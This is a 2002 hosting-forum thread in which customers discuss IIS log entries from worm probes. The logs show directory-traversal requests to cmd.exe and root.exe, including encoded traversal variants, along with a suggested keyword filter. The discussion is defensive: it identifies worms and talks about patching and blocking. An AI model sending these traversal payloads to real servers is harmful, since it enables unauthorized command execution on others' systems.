Reseller Hosting, Shared Hosting, Dedicated Hosting by Vortech Inc.

Go Back   Reseller Hosting, Shared Hosting, Dedicated Hosting by Vortech Inc. > >> General Public > Chit Chat Public
User Name
Password
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Chit Chat Public Talk about any thing you want! This forum is public.

Reply
 
Thread Tools Search this Thread Display Modes
  #1  
Old 09-19-2002, 01:29 PM
xweb's Avatar
xweb xweb is offline
5 Against 1
Vortech Inc. Customer
 
Question Windows Attacks

Anyone else seeing these entries in their logs? Why do people even bother to try this crap?

2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/root.exe /c+dir 404 3 4184 72 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /MSADC/root.exe /c+dir 404 3 4184 70 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 4184 80 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 4184 80 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 117 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 117 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 3 4184 145 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 98 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 100 16 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -
Reply With Quote
  #2  
Old 09-19-2002, 01:37 PM
mranderson
Guest
 
That happens ALL THE TIME when you have a windows machine online. Nothing you can do except hope the servers are patched =)
Reply With Quote
  #3  
Old 09-19-2002, 01:43 PM
admin's Avatar
admin admin is offline
Vortech Inc. Owner
Owner
 
Location: Orlando FL
Send a message via ICQ to admin
Yep

They are all patched its just Codered running around trying to get in to servers..
Reply With Quote
  #4  
Old 09-19-2002, 02:55 PM
BCS BCS is offline
Chief Bottle Washer
Vortech Inc. Customer
 
Welcome to the wonderful world of hosting

Seriously, this is the signature of a Sir-Cam type
worm virus. Probably from a computer that the
owner doesn't even know they are infected.

For Unix based hosting, you are usually safe against
these attacks since the requests do not apply. It's
common to see these in Unix logs as well.

With windows based, if the IIS machine is current on
any MS security updates, they are usually not a
problem.
__________________
Bill
===
Linux... the better picker-upper

Last edited by BCS : 09-19-2002 at 02:58 PM.
Reply With Quote
  #5  
Old 09-19-2002, 05:39 PM
xweb's Avatar
xweb xweb is offline
5 Against 1
Vortech Inc. Customer
 
Thumbs up

Yes, however, it sure does clog up the log files!
Reply With Quote
  #6  
Old 09-19-2002, 05:46 PM
admin's Avatar
admin admin is offline
Vortech Inc. Owner
Owner
 
Location: Orlando FL
Send a message via ICQ to admin
xweb

We will be setting up a new firewall here soon so i may make a forum for this.. Where users could submit there logs and we could block the server doing it and send them an email. It would be a lot of work but maybe able to work some thing out.
Reply With Quote
  #7  
Old 09-20-2002, 05:00 AM
jammin jammin is offline
Vortech Inc. Customer
Vortech Inc. Customer
 
Sounds like a good idea...

Not sure if you can, but ideally if you can filter keywords in the http get command, you could cut out most of these with a few choice words..

eg

/winnt/
/cmd.exe

etc... of course you would have to be VERY sure that no legitimate request would come through with those keywords in it!
Reply With Quote
  #8  
Old 09-20-2002, 10:53 AM
xweb's Avatar
xweb xweb is offline
5 Against 1
Vortech Inc. Customer
 
admin

That does sound like a good plan.
Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Terrorist Attacks Garreg Chit Chat Public 40 07-14-2005 12:29 AM
New computer worm attacks bulletin boards DVHost Chit Chat Public 9 12-22-2004 08:45 PM
DOS Attacks Garreg Chit Chat Public 4 08-27-2003 08:12 PM


All times are GMT -5. The time now is 01:28 AM.


Powered by vBulletin Version 3.5.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Vortech Inc. ©2005
Page generated in 0.50803 seconds with 17 queries
[Output: 71.65 Kb. compressed to 66.33 Kb. by saving 5.31 Kb. (7.41%)]